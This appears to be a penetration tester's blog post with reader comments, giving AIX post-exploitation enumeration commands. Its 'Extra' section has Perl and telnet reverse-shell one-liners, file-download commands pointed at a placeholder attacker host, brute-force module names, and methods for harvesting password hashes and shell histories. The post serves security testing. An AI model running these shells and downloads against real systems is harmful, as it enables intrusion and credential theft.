Post Exploitation

AIX for Penetration Testers

Background:

On a recent internal pentesting engagement I managed to get an unprivileged shell on one of my client’s servers. It was a business critical server so enumerating it and rooting it was the next logical move to make.

I always begin my enumeration by running the “uname -a” command to get some basic system information; funny thing though, this time around I had no idea what some of the output meant.

This was my first encounter with privilege escalation on AIX and I was pretty surprised by how little information I found online on enumerating AIX systems. Most of the post-exploitation guides/posts I read only mentioned where the user password hash file is stored (/etc/security/passwd) since it’s different from the regular location (/etc/shadow). But after I spent a little time aimlessly running commands that kept failing, I quickly realised that this wasn’t the only difference between AIX and other Unix systems.

It took me a little time going through various AIX system administration guides and command cheatsheets (links at the bottom of the post) and putting together a list of various post-exploitation techniques to use on the box. I decided to put this blog-post up with the hope that it will one day help another clueless pentester/red teamer.

AIX:

AIX (Advanced Interactive eXecutive) is a series of proprietary Unix operating systems developed and sold by IBM for several of its computer platforms. AIX is an enterprise-class OS so it tends to be preferred by large organisations like banks, governments, insurance companies, power stations and universities.

AIX’s default shell was Bourne shell (/bin/sh) up to AIX version 3, but was changed to Korn shell (/bin/ksh). The most recent version of AIX at the time of writing is AIX 7.2.

I should make it clear that majority of the basic Unix commands will work on AIX systems; navigation, directory listing, process listing, file manipulation, searching and grepping etc. You’re not going to have to relearn Unix administration from scratch. But there are some tricks you may want to add to your arsenal if you want to adequately enumerate an AIX server.

 

AIX Enumeration:

There are already plenty of great Linux post-exploitation guides on the web (links at the bottom of the post) and a lot of the enumeration techniques in them will work on AIX. So I’m going to try as much as possible not to reinvent the wheel, there will be a little repetition of basic/familiar commands but I’ll do my best to keep it to a minimum.

I like to split my system enumeration into 7 general sections, so this is what I’ll use to structure this post:

  1. System Info
  2. Users & Groups
  3. Drives & Shares
  4. Network Info
  5. Process Info
  6. Software/Packages
  7. Config & Miscellaneous

 

UPDATE: I’ve created a GitHub repo with all the enumeration tips below. You can find the repo here:
https://github.com/V1V1/AIX-for-Penetration-Testers

 

1. System Info:

CommandPurposeComments
prtconfPrints system configuration.This will give you a significant amount of information about the system; architecture, processor and memory information, network information, storage information etc.
This is probably the first command you should run on AIX systems since it will give you a lot of useful information about the server.
uname -aPrints the OS name, hostname, release number of the operating system, operating system version and machine ID.-
uname -xPrints the information specified with the ‘-a’ flag as well as the LAN network number, as specified by the ‘-l’ flag.-
uname -MPrints the system model.-
uname -uDisplays the system ID/serial number.-
oslevel -sPrints AIX version information.Sample output:
6100-07-05-1228

The first four digits are the major release e.g. AIX 6.1
The next two digits denote the TL (Technology Level) e.g. TL07
The third set of digits are the SP (Service Pack) e.g. SP05
The final four digits are the (US format) date of this release e.g. 28th December
lscfg -pPrints list of all installed resources.-
lsdev -C | sort -dPrints list of all hardware attached to the server.-
lssrc -aPrints list of all system resources on the server.-

 

2. Users & Groups:

CommandPurposeComments
idPrints current user’s details and group information.-
who -a / w / last -aPrints information about logged in users.-
cat /etc/passwdPrints list of all users.-
lsuser ALLPrints list of all users and their attributes.-
cat /etc/groupPrints list of all groups.-
lsgroup ALLPrints list of all groups and their attributes (including members).-
cat /etc/security/passwdPrints list of all user’s password hashes (requires root).AIX password hashes aren’t stored in a similar format to other Unix systems. More on this later.

 

AIX User Management:

If you manage to get access to an account with user management privileges, this section might come in handy:

Unix CommandAIX CommandPurpose
useraddmkuserCreate a user.
usermodchuserModify a user.
userdelrmuserDelete a user.
usermod -schsh OR passwd -sChange a user’s shell.
passwd -lchuser login=falseLock a user’s account.

 

3. Drives & Shares:

CommandPurposeComments
lspvPrints list of disks on the server.Sample output:
hdisk1 004ce4cf0ff6d5c6 rootvg active
hdisk2 00c9b8fa3120beb9 datavg active

In this example the system has 2 physical disks and they are assigned to 2 Volume Groups (rootvg and datavg).
Every AIX system has a “rootvg” as this is where AIX is installed and the system is booted from.
lspv hdisk0Prints information about a specified hard disk-
lsvgPrints a list of all volume groups.A VG (Volume Group) is a local disk which can consist of one or more disks or LUNs (logical unit number).

VGs enable files to be spread across multiple disks (aka Physical Volumes or PVs).
lsvg -l rootvgPrints information about a specified volume group.-
mountPrints information about all mounted filesystems.-
df -k / df -hPrints mounted filesystem information; disk usage, mount location etc.-
lsps -aPrints paging space information.-
lslpp -L | grep nfsVerifies if NFS is installed.-
lssrc -g nfs | grep activeCheck NFS/NIS status.-
cat /etc/xtabChecks to see if it is an NFS server and what directories are exported.-
showmountShow hosts that export NFS directories.-
showmount –eShow what directories are exported.-

 

4. Network Info:

CommandPurposeComments
ifconfig -aPrints information about the server’s network interfaces.-
lsdev -Cc ifPrints hardware information about the server's network interfaces.-
netstat -iPrints a table of all network interfaces.-
netstat -nrPrints the server’s routing table.-
arp -aPrints the server’s arp table.-
namerslv -IsPrints a list of all the nameservers the server has access to.-
hostent -SPrints a list of all host entries on the server.-
grep 80 /etc/servicesPrints information about a specified running service.-

 

5. Process Info:

CommandPurposeComments
ps auxPrints running process information.-
who -p /var/adm/wtmpPrints the processes from users logged into the server.-

 

6. Software/Packages:

CommandPurposeComments
echo $PATHPrints the current user’s path/environment.-
whereis ‘program’Locates a specified program on the server.-
which ‘program’Locates a specified program on the server (will only search the current user’s path/environment).-
lslpp -LPrints a list of the server’s software inventory.-
lslpp -hPrints a list of the server’s software history.-
lslpp -L | grep ‘program’Searches the server’s software inventory for a specific program.-
rpm -qaPrints a list of all installed rpm packages.-
rpm -qa | grep 'package'Searches for a specific program in all installed rpm packages.-
ls -l /usr/bin/usr/bin directory listing.-

 

7. Config & Miscellaneous:

Before I get into this section, I’ll mention that there is no exhaustive guide to enumerating every server’s configuration since this is completely dynamic and will vary based on the environment and the respective system’s purpose. The post-exploitation guides at the bottom of this post have a long list of techniques that you will help you out in this phase. That said, I’ll summarise some general strategies that may come in handy.

TargetStrategiesSample commands
Configuration filesLike most Unix systems, AIX has a ‘/etc’ directory where you’re likely to find lots of configuration files, so take your time going through it.
Search individual user’s home directories for configuration directories/files e.g. the ‘.ssh’ folder.
Also search additional/3rd party software directories and files. AIX is often used for sensitive applications such as core banking systems and you may be fortunate enough to find gems like hard-coded database passwords in these files.
ls -l /etc

ls -lR /etc/ | grep "conf"

ls -lR /path/to/somewhere/ | grep "config"
User activityShow me your shell history and I’ll show you who you are.
A user’s history can often reveal a lot of sensitive information. I’ve often come across admin’s echoing passwords into commands to avoid inputting them in interactive prompts.
Search home folders and other directories for scripts written by server admins, these can occasionally be gold mines.
cat /home/USER/.sh_history

cat /home/USER/.vi_history

cat /home/USER/.profile

grep ^sh /home/*/.*hist*

grep ^ssh /home/*/.*hist*

grep ^telnet /home/*/.*hist*

ls -lR /path/to/somewhere/ | grep "\.sh"
Cron jobsCron allows admins to schedule tasks to run any hour of the day or night, making regular upkeep a breeze.
Customs scripts specified in cron jobs can often contain sensitive information like passwords.
crontab -l

cat /var/spool/cron/crontabs

cat /var/adm/cron/log

cat /var/adm/cron/cron.deny

cat /var/adm/cron/cron.allow
LogsLog files can occasionally contain sensitive information.
AIX has various directories you should search for potentially sensitive log files.
You can also use the ‘alog’ utility to view specific logs.
AIX also comes with the ‘errpt’ utility which you can use to generate error reports from entries in an error log. You can read more about its usage here.
ls /var/log/

ls /var/adm

cat /var/log/messages

cat /var/adm/messages

cat /var/adm/ras/errlog

alog -L

#List all available logs

alog -o -t LOG
#Views a specific log e.g. to view the boot log; alog -o -t boot

errpt | head
#View most recent error log entries
Archive filesArchive files are often used to backup data and you may come across archive files which contain sensitive information (e.g. application passwords, configuration files, ssh keys and databases).
Use find to discover archive files (e.g. .tar, .gz, .a)
AIX libraries with the “.a” extension are ‘ar’ compressed files.
ar is a compressing utility of archive files. The tool is installed by default on AIX.
ls -lR /path/to/somewhere/ | grep "\.tar"

ls -lR /path/to/somewhere/ | grep "\.gz"

ls -lR /path/to/somewhere/ | grep "\.a"
“Interesting” filesAgain, this varies significantly depending on the server’s purpose.
The ‘find’ command works on AIX, so the options here are limitless.

Some general strategies:
Review all SUID/SGID/SETUID/SETGID files.
Search and grep for files with interesting string e.g. password.
Search the ‘/tmp’ directory.
find / -user root -perm -4000 -print 2>/dev/null

find / -perm -1000 -print 2>/dev/null

find / -perm -2000 -print 2>/dev/null

find / -perm -3000 -print 2>/dev/null

grep -rnw /path/to/somewhere/ -e "password"

ls -la /tmp

 

Extra:

This section was a bit of an afterthought but I decided to throw it in anyway. It’s basically a few techniques involving default AIX packages/services that you may find useful at various stages of your assessment.

1. Exploitation – getting your initial foothold:

The attack vectors available to you will completely depend on the server’s configuration and running services. You MAY find some of the services listed below running on AIX servers.

PortServiceAttack Vector
21FTPBrute force.

Metasploit module:
auxiliary/scanner/ftp/ftp_login
22SSHBrute force.

Metasploit module:
auxiliary/scanner/ssh/ssh_login
23TelnetBrute force.

Metasploit module:
auxiliary/scanner/telnet/telnet_login
512rexecBrute force.

Metasploit module:
auxiliary/scanner/rservices/rexec_login
513rloginBrute force.
Metasploit module:
auxiliary/scanner/rservices/rlogin_login
80, 443 and countless others; this will vary depending on what additional software is installed on the server.WebDefault passwords, brute force, shell uploads (WAR, jsp) etc.

 

2. Reverse shells:

So you have command execution and want to level up and get a reverse shell? Setup a listener and try a few of the commands below.

Software/PackageCommand
Perl/usr/bin/perl -e 'use Socket;$i="ATTACKER-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
Telnettelnet ATTACKER-IP 80 | /bin/sh | LOCAL-IP 44445
Telnettelnet ATTACKING-IP 80 | /bin/sh | telnet ATTACKING-IP 443

NOTE: Remember to listen on both port 80 & 443.

 

3. TTY shells:

As is often the case, you may have found yourself in a restricted non-tty shell that limits your options when interacting with the server. Here are some tty shell spawns to try out.

Software/PackageCommand
/bin/sh/bin/sh -i
Perlperl -e 'exec "/bin/sh";'
Perlperl: exec "/bin/sh";

 

4. File downloads:

At some point during your post-exploitation, you’re probably going to want to download a file like a privilege escalation exploit onto the server. Default AIX installations are missing a lot of the basic utilities you’re likely to come across on other Unix systems. The server I was on didn’t have wget, curl or nc installed. Admins may install some of them as additional utilities, but it’s safer to assume you won’t find any of them on the box.

Fortunately, there are some default programs installed on AIX that can aid you with file downloads.

Software/PackageCommand
FTPftp ATTACKER-IP

Input username & password
get FILE
exit
SCPscp ATTACKER-USER@ATTACKER-IP:/path/to/remote/FILE /path/to/local/FILE
Telnet(echo 'GET /FILE'; echo ""; sleep 1; ) | telnet ATTACKER-IP 80 > FILE'

NOTE: This command will also record some unnecessary telnet command output at the top of the downloaded file which could affect execution if it’s a shell script. You can use tail to strip this unnecessary output:

tail -n +6 FILE > FILE2
Perlecho '#!/usr/bin/perl' > downloader.pl && echo 'use LWP::Simple; getstore("http://ATTACKER-IP:80/FILE", "FILE");' >> downloader.pl && perl downloader.pl
Perllwp-download http://ATTACKER-IP/FILE

NOTE: lwp-download usually comes packaged with Perl.

 

5. Privilege Escalation:

IBM is quite proud of AIX’s security reputation, with good reason too; there aren’t a lot of exploits out there for their product. Good news is that Offensive Security’s Exploit Database does have a number of privilege escalation exploits for various versions of AIX that you may find useful.

searchsploit_AIX_privesc

 

6. Cracking AIX passwords:

AIX’s user password hashes are stored in the ‘/etc/security/passwd’ file. I had mentioned earlier that these hashes aren’t stored in a format similar to other Unix systems. Hashcat does have support for various hashing mechanisms used by AIX systems, you can find some example hashes here (search for AIX).

I also found a Metasploit module that uses John the Ripper to identify weak passwords acquired from AIX systems, but I haven’t tried this out yet. I’ll be sure to update this post when I do.

Summary:

Like I said at the beginning, I wrote this post because I was desperately looking for something like it when I was starting my AIX post-exploitation. It’s not a comprehensive guide to AIX/Unix enumeration, but with any luck it may come to the aid of another despairing internet adventurer in the future. If it helps just one person, then it’s served its purpose. Happy hunting.

References:

I went through some incredibly informative material that helped me out both during my engagement (yes, I did root the server 🙂 ) and the writing of this post.

 

1. Linux Post Exploitation:

2. AIX Sysadmin Guides & Cheatsheets:

3. Breaking AIX:

4. Securing AIX – because I love blue teamers 😉

 

7 Comments

  1. smit is the main tool to configure an AIX system, a regular user can access a lot of the available pages on a read only basis.

    lsof is not part of AIX, but is available as part of the AIX Linux Toolbox . fuser, procfile and pstat are usually available though.

    1. Wow. Thanks, man. I can’t believe I missed out on SMIT.
      lsof was running on the AIX server I was playing with, I hadn’t considered that it was an additional utility. I’ll remove it from the list. Thanks!

  2. Cool stuff – thanks for the share.

    You should do an add-on post and walk through how you got access and rooted the box.

  3. I recently had to learn all I could about vulnerability detection on AIX and found some info you might enjoy. Some of this may be wrong, so if anyone wants to correct me I’d appreciate it. While lslpp will show version numbers of installed packages, IBM has a weird method of applying software patches that doesn’t always show in package version numbers. You can use instfix to search for security patches although IBM states, “Ifix IDs can change as interim fixes are removed and added” so it’s not a foolproof method of checking. An ifix ID for a specific security patch will be listed in an APAR. What’s an APAR? Read IBMSpeak on it here http://www-01.ibm.com/support/docview.wss?uid=swg21424131.

    Lets say you want to check for the bellmail vuln CVE-2016-8972. The APAR can be found on this security advisory http://aix.software.ibm.com/aix/efixes/security/bellmail_advisory.asc. The ifix # is found in the Interim Fix field and you can use it with instfix to see if the patch has been applied… assuming IBM hasn’t decided to change the #. For the above CVE, the ifix # is IV91011s1a. I find it’s better to search for IV91011 as it seems the last 3 may show minor version and patch fixes. On AIX you can run “instfix -ivk IV91011” to see if it’s installed. You can run “instfix -iv > output.txt” to just grab the list of all patches. instfix does not require root/sudo permissions.

    If you do have root access, you can use emgr to install fixes or check to see what’s applied. “emgr -l -v3” will list all applied ifixes with a high level of verbosity, including CVE #s. You may want to redirect that to a file as it can dump a lot of info. Here’s more about emgr http://www-01.ibm.com/support/docview.wss?uid=isg3T1012104.

    Thanks for writing this blog, I wish I had been around a couple of months ago when I had to learn AIX!

    1. Nice! I hadn’t gotten that far with vulnerability detection in AIX, I’m still working on figuring out the basics.
      This is definitely interesting material. Thanks for the share! 🙂

Leave a Reply

Your email address will not be published. Required fields are marked *